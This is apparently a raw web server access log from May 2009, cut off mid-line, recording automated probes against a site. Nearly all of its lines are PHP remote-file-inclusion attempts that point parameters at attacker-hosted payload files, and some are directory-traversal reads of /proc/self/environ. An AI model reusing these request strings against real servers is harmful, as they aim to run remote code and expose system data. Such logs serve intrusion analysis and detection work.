85.214.86.93 - - [13/May/2009:12:17:19 -0500] "GET /logs/access_log.1231372800//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 396 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:17:19 -0500] "GET //data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 369 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:17:19 -0500] "GET /logs//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 374 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:16 -0500] "GET /errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:17 -0500] "GET /logs/access_log.1238112000/errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:17 -0500] "GET /logs/errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:52 -0500] "GET /logs/access_log.1238112000/errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:52 -0500] "GET /logs/errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:18:52 -0500] "GET /errors.php?error=http://h1.ripway.com/adit212/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
77.221.130.12 - - [13/May/2009:12:19:17 -0500] "GET /add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 290 "-""libwww-perl/5.805"
77.221.130.12 - - [13/May/2009:12:19:17 -0500] "GET /logs/add.php?APB_rp=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.805"
85.18.117.101 - - [13/May/2009:12:19:42 -0500] "GET /class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:42 -0500] "GET /logs/access_log.1233273600/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:42 -0500] "GET /logs/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:42 -0500] "GET /logs/access_log.1234656000/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:19:45 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:19:45 -0500] "GET /logs/access_log.1231718400//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:19:45 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:19:46 -0500] "GET /logs/access_log.1234224000//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:55 -0500] "GET /class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:55 -0500] "GET /logs/access_log.1234656000/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:55 -0500] "GET /logs/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
85.18.117.101 - - [13/May/2009:12:19:55 -0500] "GET /logs/access_log.1233273600/class_item.php?fileExtension=http://www.rabattguiden.se/includes/phpInputFilter/id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
65.98.59.178 - - [13/May/2009:12:19:56 -0500] "GET /errors.php?error=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
200.93.147.154 - - [13/May/2009:12:22:51 -0500] "GET /logs/errors.php?error=http://h1.ripway.com/rina212/id1.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
200.93.147.154 - - [13/May/2009:12:22:51 -0500] "GET /errors.php?error=http://h1.ripway.com/rina212/id1.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
200.93.147.154 - - [13/May/2009:12:22:51 -0500] "GET /logs/access_log.1240012800/errors.php?error=http://h1.ripway.com/rina212/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
200.93.147.154 - - [13/May/2009:12:23:39 -0500] "GET /logs/access_log.1238112000/errors.php?error=http://h1.ripway.com/rina212/id1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:24:03 -0500] "GET /logs/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:24:03 -0500] "GET /editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 295 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:24:06 -0500] "GET /logs/access_log.1239494400/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:24:06 -0500] "GET /logs/access_log.1238112000/editsite.php?returnpath=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs/access_log.1233100800//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs/access_log.1236643200//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET //install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 304 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 309 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs/access_log.1236643200//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:27:51 -0500] "GET /logs/access_log.1233964800//install/install3.php?database=none&cabsolute_path=http://lubimezmus.com/langs/copyright.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.114.132.122 - - [13/May/2009:12:28:25 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:28:25 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:28:41 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:28:41 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
61.67.196.130 - - [13/May/2009:12:29:24 -0500] "GET /library/lib.php?root=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
61.67.196.130 - - [13/May/2009:12:29:25 -0500] "GET /logs/library/lib.php?root=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 303 "-""Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)"
61.67.196.130 - - [13/May/2009:12:29:25 -0500] "GET /errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 293 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
61.67.196.130 - - [13/May/2009:12:29:25 -0500] "GET /logs/errors.php?error=http://www.ayj.ca/buggsbunny?? HTTP/1.1" 404 298 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
61.67.196.130 - - [13/May/2009:12:29:27 -0500] "GET /logs/library/lib.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 303 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:12:29:27 -0500] "GET /library/lib.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 298 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:12:29:28 -0500] "GET /logs/library/lib.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 303 "-""XXXXXX"
61.67.196.130 - - [13/May/2009:12:29:28 -0500] "GET /library/lib.php?root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""XXXXXX"
85.114.132.122 - - [13/May/2009:12:32:15 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:32:15 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
122.116.178.20 - - [13/May/2009:12:32:21 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:32:21 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:32:21 -0500] "GET /logs/access_log.1230681600//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.116.178.20 - - [13/May/2009:12:32:35 -0500] "GET /logs/access_log.1233964800//skin/zero_vote/ask_password.php?dir=http://www.ladyboss.com.ua/fx29id2.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
85.114.132.122 - - [13/May/2009:12:32:51 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:32:52 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:12:34:05 -0500] "GET /logs/home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:05 -0500] "GET /home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:25 -0500] "GET /logs//include/write.php?dir=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:25 -0500] "GET //include/write.php?dir=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:39 -0500] "GET /logs//include/write.php?dir=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 306 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:39 -0500] "GET //include/write.php?dir=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 301 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:40 -0500] "GET /logs/home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:34:41 -0500] "GET /home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.803"
85.214.86.93 - - [13/May/2009:12:35:46 -0500] "GET /logs/access_log.1231372800//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:35:46 -0500] "GET /logs//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 374 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:35:46 -0500] "GET //data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 369 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:35:46 -0500] "GET /logs/access_log.1233187200//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:35:58 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:35:58 -0500] "GET /logs//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:35:58 -0500] "GET //shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:35:58 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:36:06 -0500] "GET /logs//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:36:06 -0500] "GET //shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:36:06 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:36:06 -0500] "GET /logs/access_log.1232841600//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
75.127.68.192 - - [13/May/2009:12:37:26 -0500] "GET /logs/lostpasswd.php?env[include_prefix]=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.810"
75.127.68.192 - - [13/May/2009:12:37:27 -0500] "GET /lostpasswd.php?env[include_prefix]=http://koti.mbnet.fi/some/kuvia/b1ttletX1.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.810"
65.98.59.178 - - [13/May/2009:12:38:35 -0500] "GET //convert/mvcw.php?step=1&vwar_root=http://h1.ripway.com/lupa121/makan.txt??? HTTP/1.1" 404 300 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
200.32.100.130 - - [13/May/2009:12:38:38 -0500] "GET /logs/access_log.1233705600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:12:38:38 -0500] "GET //technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:12:38:38 -0500] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 353 "-""Mozilla/5.0"
200.32.100.130 - - [13/May/2009:12:38:38 -0500] "GET /logs/access_log.1237161600//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 375 "-""Mozilla/5.0"
212.227.96.166 - - [13/May/2009:12:38:48 -0500] "GET /logs//?_PHPLIB[libdir]=http://lubimezmus.com/langs/safe1.txt??? HTTP/1.1" 200 189195 "-""libwww-perl/5.803"
212.227.96.166 - - [13/May/2009:12:38:48 -0500] "GET //?_PHPLIB[libdir]=http://lubimezmus.com/langs/safe1.txt??? HTTP/1.1" 200 3245 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:40:16 -0500] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
85.114.132.122 - - [13/May/2009:12:40:16 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:40:16 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 336 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:12:40:16 -0500] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
67.204.0.222 - - [13/May/2009:12:40:16 -0500] "GET /logs/errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.803"
85.114.132.122 - - [13/May/2009:12:40:16 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
85.114.132.122 - - [13/May/2009:12:40:16 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://alwaysdollar.com/portal/frameset/html/inc/elang/test.txt?? HTTP/1.1" 404 331 "-""libwww-perl/5.805"
67.204.0.222 - - [13/May/2009:12:40:16 -0500] "GET /errors.php?error=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.803"
85.214.86.93 - - [13/May/2009:12:40:18 -0500] "GET /logs/access_log.1230768000//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 396 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:40:18 -0500] "GET /logs/access_log.1237161600//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 396 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:41:17 -0500] "GET /logs/access_log.1230768000//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
85.214.86.93 - - [13/May/2009:12:41:17 -0500] "GET /logs/access_log.1237161600//data/shirohige/technote7/skin_shop/standard/2_view_body/skin_shop/standard/errors.php?error=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 396 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:41:28 -0500] "GET /logs/access_log.1238630400//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:41:28 -0500] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:41:28 -0500] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
116.122.158.194 - - [13/May/2009:12:41:29 -0500] "GET /logs/htmltonuke.php?filnavn=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
116.122.158.194 - - [13/May/2009:12:41:30 -0500] "GET /htmltonuke.php?filnavn=http://indoirc.go.ro/idscan.txt??? HTTP/1.1" 404 297 "-""libwww-perl/5.805"
211.110.19.178 - - [13/May/2009:12:41:30 -0500] "GET /logs/access_log.1237161600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.110.19.178 - - [13/May/2009:12:41:30 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
211.110.19.178 - - [13/May/2009:12:41:30 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.110.19.178 - - [13/May/2009:12:41:30 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://laskar.mw.lt/id.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
77.221.130.19 - - [13/May/2009:12:41:44 -0500] "GET /logs/home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 296 "-""libwww-perl/5.805"
77.221.130.19 - - [13/May/2009:12:41:47 -0500] "GET /home.php?index=http://www.juarteakorea.co.kr/board/rgboard//include/w.txt?? HTTP/1.1" 404 291 "-""libwww-perl/5.805"
121.165.73.157 - - [13/May/2009:12:42:19 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:42:19 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:42:19 -0500] "GET /logs/access_log.1236643200//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.165.73.157 - - [13/May/2009:12:42:19 -0500] "GET /logs/access_log.1236297600//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://backs.thewomanizer.net/remember.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:43:01 -0500] "GET /logs/access_log.1235779200//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:43:01 -0500] "GET /logs//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 303 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:43:01 -0500] "GET //shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:43:08 -0500] "GET /logs/access_log.1238284800//shop/index.php?_shop_path=http://www.nw.or.kr/bbs/icon/idxx.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
84.32.195.2 - - [13/May/2009:12:43:08 -0500] "GET /logs/acces